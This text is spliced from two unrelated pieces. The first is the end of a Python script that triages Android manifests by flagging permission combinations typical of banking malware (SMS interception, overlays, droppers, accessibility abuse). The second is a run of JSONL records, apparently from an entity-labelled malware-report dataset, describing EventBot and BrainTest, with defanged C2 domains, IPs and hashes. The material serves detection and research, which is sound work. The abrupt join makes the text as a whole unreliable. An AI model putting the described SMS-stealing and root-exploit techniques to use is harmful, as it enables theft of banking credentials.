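  <uses-permission android:name="android.permission.REQUEST_COMPANION_USE_DATA_IN_BACKGROUND"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application>
    <service android:name=".AccessService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""

# Constructed benign manifest for comparison.
BENIGN_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>
"""

# (rule name, permissions that must all be present, why it matters)
RULES = [
    ("sms_interception",
     frozenset({"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}),
     "reads and receives SMS: one-time codes can be intercepted"),
    ("overlay",
     frozenset({"android.permission.SYSTEM_ALERT_WINDOW"}),
     "draws over other apps: phishing overlays and webinjects"),
    ("dropper",
     frozenset({"android.permission.REQUEST_INSTALL_PACKAGES"}),
     "can install further packages"),
    ("persistence",
     frozenset({"android.permission.RECEIVE_BOOT_COMPLETED",
                "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"}),
     "restarts at boot and asks to be exempt from battery optimisation"),
]


def parse_manifest(xml_text: str) -> Dict[str, object]:
    """Collect declared permissions and whether an accessibility service exists."""
    root = ET.fromstring(xml_text.strip())
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    accessibility = any(
        s.get(A + "permission") == "android.permission.BIND_ACCESSIBILITY_SERVICE"
        for s in root.iter("service"))
    return {"package": root.get("package"), "permissions": perms,
            "accessibility_service": accessibility}


def triage(info: Dict[str, object]) -> List[str]:
    """Names of the rules that fire, in RULES order, then the service check."""
    findings = [name for name, needed, _ in RULES if needed <= info["permissions"]]
    if info["accessibility_service"]:
        findings.append("accessibility_service")
    return findings


def verdict(findings: List[str]) -> str:
    """Overlay + SMS + accessibility together is the banker profile."""
    if {"accessibility_service", "sms_interception", "overlay"} <= set(findings):
        return "high"
    return "medium" if findings else "low"


if __name__ == "__main__":
    info = parse_manifest(SAMPLE_MANIFEST)
    found = triage(info)
    print(info["package"], found, verdict(found))  # com.example.update [...] high
```

Against a real APK, run `apktool d sample.apk` and point `parse_manifest` at the decoded `AndroidManifest.xml`; individually most of these permissions are legitimate, which is why the rules score combinations rather than single entries.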
{"id": "cyner_valid_000324", "source": "cyner_valid"}} {"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES .", "spans": {"Malware: EventBot": [[35, 43]], "System: ChaCha20": [[54, 62]]}, "info": {"id": "cyner_valid_000325", "source": "cyner_valid"}} {"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device ’ s SDK version to parse them correctly .", "spans": {"Malware: EventBot": [[15, 23]]}, "info": {"id": "cyner_valid_000327", "source": "cyner_valid"}} {"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000328", "source": "cyner_valid"}} {"text": "Webinjects : According to the bot ’ s configuration , if a webinject is set for a given application , it will be executed .", "spans": {}, "info": {"id": "cyner_valid_000329", "source": "cyner_valid"}} {"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot ’ s configuration XML files , located in the shared preferences folder on the device .", "spans": {"Malware: EventBot": [[12, 20], [75, 83]]}, "info": {"id": "cyner_valid_000331", "source": "cyner_valid"}} {"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000332", "source": "cyner_valid"}} {"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000333", "source": "cyner_valid"}} {"text": "The following code shows EventBot parsing instructions sent from the C2 .", "spans": {"Malware: EventBot": [[25, 33]]}, "info": {"id": "cyner_valid_000334", "source": "cyner_valid"}} {"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 
Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 .", "spans": {"Malware: EventBot": [[27, 35], [85, 93]]}, "info": {"id": "cyner_valid_000336", "source": "cyner_valid"}} {"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim ’ s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent .", "spans": {"Malware: EventBot": [[21, 29]], "System: Android": [[81, 88]]}, "info": {"id": "cyner_valid_000337", "source": "cyner_valid"}} {"text": "If the connection to the C2 fails , it will continue to retry until it is successful .", "spans": {}, "info": {"id": "cyner_valid_000339", "source": "cyner_valid"}} {"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis .", "spans": {"Malware: EVENTBOT": [[0, 8]], "Malware: EventBot": [[73, 81]]}, "info": {"id": "cyner_valid_000341", "source": "cyner_valid"}} {"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module .", "spans": {"Malware: EventBot": [[31, 39]]}, "info": {"id": "cyner_valid_000343", "source": "cyner_valid"}} {"text": "EventBot loaded library Loaded library as seen in Logcat .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000344", "source": "cyner_valid"}} {"text": "By browsing EventBot ’ s installation path on the device , we can see the library dropped in the app_dex folder .", "spans": {"Malware: EventBot": [[12, 20]]}, "info": {"id": "cyner_valid_000345", "source": "cyner_valid"}} {"text": "EventBot loaded library The loaded library dropped on the device .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000346", "source": "cyner_valid"}} {"text": "The code to load the main module dynamically can also be seen statically .", 
"spans": {}, "info": {"id": "cyner_valid_000347", "source": "cyner_valid"}} {"text": "The malicious library is loaded from Eventbot ’ s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 .", "spans": {"Malware: Eventbot": [[37, 45]]}, "info": {"id": "cyner_valid_000348", "source": "cyner_valid"}} {"text": "EventBot method responsible for the library loading The method responsible for the library loading .", "spans": {}, "info": {"id": "cyner_valid_000349", "source": "cyner_valid"}} {"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000350", "source": "cyner_valid"}} {"text": "An updated library name is generated by calculating the md5sum of several device properties , while concatenating the build model twice in case of an update to the library .", "spans": {}, "info": {"id": "cyner_valid_000351", "source": "cyner_valid"}} {"text": "EventBot Updated library naming convention EventBot New library naming convention .", "spans": {"Malware: EventBot": [[43, 51]]}, "info": {"id": "cyner_valid_000352", "source": "cyner_valid"}} {"text": "Data Encryption The Curve25519 encryption algorithm was implemented as of EventBot Version 0.0.0.2 .", "spans": {"Malware: EventBot": [[74, 82]]}, "info": {"id": "cyner_valid_000353", "source": "cyner_valid"}} {"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption .", "spans": {}, "info": {"id": "cyner_valid_000354", "source": "cyner_valid"}} {"text": "When reviewing the decrypted packet , it ’ s clear it has the same content as previous versions .", "spans": {}, "info": {"id": "cyner_valid_000355", "source": "cyner_valid"}} {"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 
using Curve25519 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000356", "source": "cyner_valid"}} {"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 .", "spans": {}, "info": {"id": "cyner_valid_000357", "source": "cyner_valid"}} {"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section .", "spans": {}, "info": {"id": "cyner_valid_000358", "source": "cyner_valid"}} {"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries .", "spans": {}, "info": {"id": "cyner_valid_000359", "source": "cyner_valid"}} {"text": "It listens to events like TYPE_VIEW_TEXT_CHANGED .", "spans": {}, "info": {"id": "cyner_valid_000361", "source": "cyner_valid"}} {"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc .", "spans": {}, "info": {"id": "cyner_valid_000362", "source": "cyner_valid"}} {"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000363", "source": "cyner_valid"}} {"text": "After collecting the changed PIN code , it is sent back to the C2 .", "spans": {}, "info": {"id": "cyner_valid_000364", "source": "cyner_valid"}} {"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000365", "source": "cyner_valid"}} {"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder .", "spans": {}, "info": {"id": "cyner_valid_000366", "source": "cyner_valid"}} 
{"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml .", "spans": {}, "info": {"id": "cyner_valid_000367", "source": "cyner_valid"}} {"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices .", "spans": {"Organization: Samsung": [[83, 90]]}, "info": {"id": "cyner_valid_000368", "source": "cyner_valid"}} {"text": "EVENTBOT VERSION 0.4.0.1 Package Name Randomization In this version , the package name is no longer named ‘ com.example.eventbot ’ , which makes it more difficult to track down .", "spans": {}, "info": {"id": "cyner_valid_000370", "source": "cyner_valid"}} {"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000371", "source": "cyner_valid"}} {"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation .", "spans": {"System: ProGuard": [[0, 8]], "System: Android": [[40, 47]], "Malware: EventBot": [[63, 71]]}, "info": {"id": "cyner_valid_000372", "source": "cyner_valid"}} {"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters .", "spans": {}, "info": {"id": "cyner_valid_000373", "source": "cyner_valid"}} {"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier .", "spans": {}, "info": {"id": "cyner_valid_000374", "source": "cyner_valid"}} {"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000375", "source": "cyner_valid"}} {"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation .", "spans": {"Malware: EventBot": [[47, 55]]}, "info": {"id": "cyner_valid_000376", "source": "cyner_valid"}} {"text": "Due to this obfuscation , a part of the previously mentioned cfg 
class is now mapped to c/b/a/a/a or c/a/a/a/a .", "spans": {}, "info": {"id": "cyner_valid_000377", "source": "cyner_valid"}} {"text": "EventBot C2 URLs C2 URLs and other settings in a nested class .", "spans": {}, "info": {"id": "cyner_valid_000378", "source": "cyner_valid"}} {"text": "Other configuration data is located elsewhere , and some of it can be seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version", "spans": {"Malware: EventBot": [[478, 486]]}, "info": {"id": "cyner_valid_000379", "source": "cyner_valid"}} {"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot “ cfg ” class EventBot “ cfg ” class .", "spans": {"Malware: EventBot": [[33, 41], [56, 64]]}, "info": {"id": "cyner_valid_000381", "source": "cyner_valid"}} {"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc .", "spans": {"Malware: EventBot": [[40, 48]]}, "info": {"id": "cyner_valid_000383", "source": "cyner_valid"}} {"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational .", "spans": {}, "info": {"id": "cyner_valid_000384", "source": "cyner_valid"}} {"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we ’ ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal .", 
"spans": {"Malware: EventBot": [[63, 71], [156, 164], [244, 252]]}, "info": {"id": "cyner_valid_000385", "source": "cyner_valid"}} {"text": "Also , the botnet IDs increment over time as they are submitted .", "spans": {}, "info": {"id": "cyner_valid_000387", "source": "cyner_valid"}} {"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases .", "spans": {}, "info": {"id": "cyner_valid_000388", "source": "cyner_valid"}} {"text": "It may be that these submissions are made from the author ’ s machine , or that they submit it to a detection service that in turn submits to online malware databases .", "spans": {}, "info": {"id": "cyner_valid_000389", "source": "cyner_valid"}} {"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot .", "spans": {"Malware: EVENTBOT": [[0, 8]], "Organization: Cybereason Nocturnus": [[61, 81]], "Malware: EventBot": [[157, 165]]}, "info": {"id": "cyner_valid_000390", "source": "cyner_valid"}} {"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far .", "spans": {"Malware: EventBot": [[33, 41]]}, "info": {"id": "cyner_valid_000391", "source": "cyner_valid"}} {"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[121, 129]]}, "info": {"id": "cyner_valid_000392", "source": "cyner_valid"}} {"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway .", "spans": {}, "info": {"id": "cyner_valid_000393", "source": 
"cyner_valid"}} {"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware .", "spans": {"Malware: EventBot": [[95, 103]]}, "info": {"id": "cyner_valid_000394", "source": "cyner_valid"}} {"text": "This strengthens our suspicion that this malware is still undergoing development and has not been officially marketed or released yet .", "spans": {}, "info": {"id": "cyner_valid_000395", "source": "cyner_valid"}} {"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c .", "spans": {"Malware: EVENTBOT": [[0, 8]]}, "info": {"id": "cyner_valid_000396", "source": "cyner_valid"}} {"text": "As of this writing , all the domains were registered recently and some are already offline .", "spans": {}, "info": {"id": "cyner_valid_000397", "source": "cyner_valid"}} {"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ .", "spans": {}, "info": {"id": "cyner_valid_000398", "source": "cyner_valid"}} {"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ .", "spans": {}, "info": {"id": "cyner_valid_000399", "source": "cyner_valid"}} {"text": "] 6 2020-02-29 http : //themoil [ .", "spans": {}, "info": {"id": "cyner_valid_000400", "source": "cyner_valid"}} {"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ .", "spans": {}, "info": {"id": "cyner_valid_000401", "source": "cyner_valid"}} {"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ .", "spans": {}, "info": {"id": "cyner_valid_000402", "source": "cyner_valid"}} {"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ .", "spans": {}, "info": {"id": "cyner_valid_000406", "source": "cyner_valid"}} {"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ .", "spans": {}, "info": {"id": "cyner_valid_000408", "source": "cyner_valid"}} {"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ .", "spans": {}, "info": {"id": 
"cyner_valid_000409", "source": "cyner_valid"}} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ .", "spans": {}, "info": {"id": "cyner_valid_000411", "source": "cyner_valid"}} {"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer .", "spans": {"Malware: Android infostealer": [[108, 127]]}, "info": {"id": "cyner_valid_000412", "source": "cyner_valid"}} {"text": "The IP address of both ora.carlaarrabitoarchitetto [ .", "spans": {}, "info": {"id": "cyner_valid_000413", "source": "cyner_valid"}} {"text": "] com , 31.214.157 [ .", "spans": {}, "info": {"id": "cyner_valid_000415", "source": "cyner_valid"}} {"text": "] 6 , was previously hosting the domain next.nextuptravel [ .", "spans": {}, "info": {"id": "cyner_valid_000416", "source": "cyner_valid"}} {"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 .", "spans": {"Malware: Android infostealer": [[23, 42]]}, "info": {"id": "cyner_valid_000418", "source": "cyner_valid"}} {"text": "EventBot VirusTotal search for the malicious IP address VirusTotal search for the malicious IP address .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000419", "source": "cyner_valid"}} {"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information and is able to hijack transactions .", "spans": {"Malware: EventBot": [[7, 15]]}, "info": {"id": "cyner_valid_000420", "source": "cyner_valid"}} {"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more .", "spans": {}, "info": {"id": "cyner_valid_000421", "source": "cyner_valid"}} {"text": "This information can give the attacker access to personal and business bank accounts , personal and business data , and more .", "spans": {}, "info": {"id": "cyner_valid_000422", "source": "cyner_valid"}} {"text": 
"60 % of devices containing or accessing enterprise data are mobile .", "spans": {}, "info": {"id": "cyner_valid_000424", "source": "cyner_valid"}} {"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information .", "spans": {}, "info": {"id": "cyner_valid_000425", "source": "cyner_valid"}} {"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust .", "spans": {}, "info": {"id": "cyner_valid_000426", "source": "cyner_valid"}} {"text": "Much like we have seen in recent months , anyone can be impacted by a mobile device attack .", "spans": {}, "info": {"id": "cyner_valid_000427", "source": "cyner_valid"}} {"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints .", "spans": {}, "info": {"id": "cyner_valid_000428", "source": "cyner_valid"}} {"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices .", "spans": {}, "info": {"id": "cyner_valid_000429", "source": "cyner_valid"}} {"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user .", "spans": {"System: CYBEREASON MOBILE": [[0, 17]], "System: Cybereason Mobile detects": [[18, 43]], "Malware: EventBot": [[44, 52]]}, "info": {"id": "cyner_valid_000430", "source": "cyner_valid"}} {"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk .", "spans": {}, "info": {"id": "cyner_valid_000432", "source": "cyner_valid"}} {"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions .", "spans": {"System: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[26, 34]]}, "info": 
{"id": "cyner_valid_000433", "source": "cyner_valid"}} {"text": "CONCLUSION In this research , the Nocturnus team has dissected a rapidly evolving Android malware in the making .", "spans": {"Organization: Nocturnus": [[34, 43]], "Malware: Android": [[82, 89]]}, "info": {"id": "cyner_valid_000434", "source": "cyner_valid"}} {"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days .", "spans": {"System: Android": [[24, 31]]}, "info": {"id": "cyner_valid_000435", "source": "cyner_valid"}} {"text": "With each new version , the malware adds new features like dynamic library loading , encryption , and adjustments to different locales and manufacturers .", "spans": {}, "info": {"id": "cyner_valid_000436", "source": "cyner_valid"}} {"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000437", "source": "cyner_valid"}} {"text": "Cybereason classifies EventBot as a mobile banking trojan and infostealer based on the stealing features discussed in this research .", "spans": {"Organization: Cybereason": [[0, 10]], "Malware: EventBot": [[22, 30]]}, "info": {"id": "cyner_valid_000438", "source": "cyner_valid"}} {"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications .", "spans": {}, "info": {"id": "cyner_valid_000439", "source": "cyner_valid"}} {"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development .", "spans": {"Malware: EventBot": [[61, 69]]}, "info": {"id": "cyner_valid_000440", "source": "cyner_valid"}} 
{"text": "The Cybereason Nocturnus team will continue to monitor EventBot ’ s development .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[55, 63]]}, "info": {"id": "cyner_valid_000441", "source": "cyner_valid"}} {"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices .", "spans": {}, "info": {"id": "cyner_valid_000442", "source": "cyner_valid"}} {"text": "Naturally , this resulted in the introduction of malware for mobile platforms , especially Android devices , including Cerberus , Xhelper and the Anubis Banking Trojan .", "spans": {"System: Android": [[91, 98]], "Malware: Cerberus": [[119, 127]], "Malware: Xhelper": [[130, 137]], "Malware: Anubis": [[146, 152]]}, "info": {"id": "cyner_valid_000443", "source": "cyner_valid"}} {"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals .", "spans": {}, "info": {"id": "cyner_valid_000444", "source": "cyner_valid"}} {"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices .", "spans": {"System: Cybereason Mobile": [[33, 50]], "System: Cybereason Defense Platform": [[89, 116]]}, "info": {"id": "cyner_valid_000445", "source": "cyner_valid"}} {"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console .", "spans": {"System: Cybereason Mobile": [[5, 22]]}, "info": {"id": "cyner_valid_000446", "source": "cyner_valid"}} {"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base .", "spans": {"Organization: Check Point": [[0, 11], [130, 141]], "System: Mobile Threat 
Prevention": [[12, 36]]}, "info": {"id": "cyner_valid_000447", "source": "cyner_valid"}} {"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice .", "spans": {"System: Android": [[33, 40]], "Malware: BrainTest": [[57, 66]], "System: Google Play": [[91, 102]]}, "info": {"id": "cyner_valid_000448", "source": "cyner_valid"}} {"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users .", "spans": {"System: Google Play": [[69, 80]]}, "info": {"id": "cyner_valid_000449", "source": "cyner_valid"}} {"text": "Overview The malware was first detected on a Nexus 5 smartphone , and although the user attempted to remove the infected app , the malware reappeared on the same device shortly thereafter .", "spans": {"System: Nexus 5": [[45, 52]]}, "info": {"id": "cyner_valid_000451", "source": "cyner_valid"}} {"text": "Our analysis of the malware shows it uses multiple , advanced techniques to avoid Google Play malware detection and to maintain persistency on target devices .", "spans": {"System: Google Play": [[82, 93]]}, "info": {"id": "cyner_valid_000452", "source": "cyner_valid"}} {"text": "Once this malware was detected on a device , Mobile Threat Prevention adjusted security policies on the Mobile Device Management solution ( MobileIron ) managing the affected devices automatically , thereby blocking enterprise access from the infected devices .", "spans": {"System: Mobile Threat Prevention": [[45, 69]]}, "info": {"id": "cyner_valid_000453", "source": "cyner_valid"}} {"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it ’ s currently installing additional apps on infected devices .", "spans": {}, "info": {"id": "cyner_valid_000454", "source": "cyner_valid"}} {"text": "Disturbingly , the malware establishes a rootkit on the device , allowing 
it to download and execute any code a cybercriminal would want to run on a device .", "spans": {}, "info": {"id": "cyner_valid_000455", "source": "cyner_valid"}} {"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device .", "spans": {}, "info": {"id": "cyner_valid_000456", "source": "cyner_valid"}} {"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities .", "spans": {"Malware: BrainTest": [[50, 59]], "System: Google Play": [[79, 90]], "Organization: Google": [[157, 163]], "System: Google Bouncer": [[184, 198], [271, 285]]}, "info": {"id": "cyner_valid_000457", "source": "cyner_valid"}} {"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware .", "spans": {}, "info": {"id": "cyner_valid_000458", "source": "cyner_valid"}} {"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th .", "spans": {"Organization: Baidu": [[48, 53]], "System: Google Play": [[85, 96]]}, "info": {"id": "cyner_valid_000459", "source": "cyner_valid"}} {"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application .", "spans": {"Malware: BrainTest": [[0, 9]], "Vulnerability: privilege escalation exploits": [[20, 49]]}, "info": {"id": "cyner_valid_000460", "source": "cyner_valid"}} {"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of 
the components and reinstall the component .", "spans": {"Malware: BrainTest": [[0, 9]], "Vulnerability: anti-uninstall watchdog": [[23, 46]]}, "info": {"id": "cyner_valid_000461", "source": "cyner_valid"}} {"text": "After the first instance of BrainTest was detected , Google removed the app from Google Play .", "spans": {"Malware: BrainTest": [[28, 37]], "Organization: Google": [[53, 59]], "System: Google Play": [[81, 92]]}, "info": {"id": "cyner_valid_000462", "source": "cyner_valid"}} {"text": "Within days , the Check Point research team detected another instance with a different package name but which uses the same code .", "spans": {"Organization: Check Point": [[18, 29]]}, "info": {"id": "cyner_valid_000463", "source": "cyner_valid"}} {"text": "The malware ’ s creators had used obfuscation to upload the new piece of malware to Google Play .", "spans": {"System: Google Play": [[84, 95]]}, "info": {"id": "cyner_valid_000464", "source": "cyner_valid"}} {"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked – com.mile.brain , Packed – com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device .", "spans": {"System: Google Play": [[168, 179]]}, "info": {"id": "cyner_valid_000465", "source": "cyner_valid"}} {"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as a system application .", "spans": {}, "info": {"id": "cyner_valid_000466", "source": "cyner_valid"}} {"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using a few anti-uninstall techniques ( described below ) and downloads and executes code from the server without user consent .", "spans": {}, "info": {"id": "cyner_valid_000467", "source": "cyner_valid"}} {"text": "Detailed Malware Structure Malware Structure com.mile.brain ( SHA256 : 
135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play .", "spans": {"System: Google Play": [[178, 189]]}, "info": {"id": "cyner_valid_000468", "source": "cyner_valid"}} {"text": "It contains encrypted java archive “ start.ogg ” in the assets directory and dynamically loads code with dalvik.system.DexClassLoader .", "spans": {}, "info": {"id": "cyner_valid_000469", "source": "cyner_valid"}} {"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by “ start.ogg. ” It sends a request to the server with the device ’ s configuration .", "spans": {}, "info": {"id": "cyner_valid_000470", "source": "cyner_valid"}} {"text": "The server ’ s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API .", "spans": {}, "info": {"id": "cyner_valid_000471", "source": "cyner_valid"}} {"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json .", "spans": {}, "info": {"id": "cyner_valid_000472", "source": "cyner_valid"}} {"text": "jhfrte.jar : This is a java archive file downloaded from server .", "spans": {}, "info": {"id": "cyner_valid_000473", "source": "cyner_valid"}} {"text": "If a device isn ’ t rooted , it downloads from the server an exploit pack and executes it to obtain root on device .", "spans": {}, "info": {"id": "cyner_valid_000474", "source": "cyner_valid"}} {"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) .", "spans": {}, "info": {"id": "cyner_valid_000475", "source": "cyner_valid"}} {"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting 
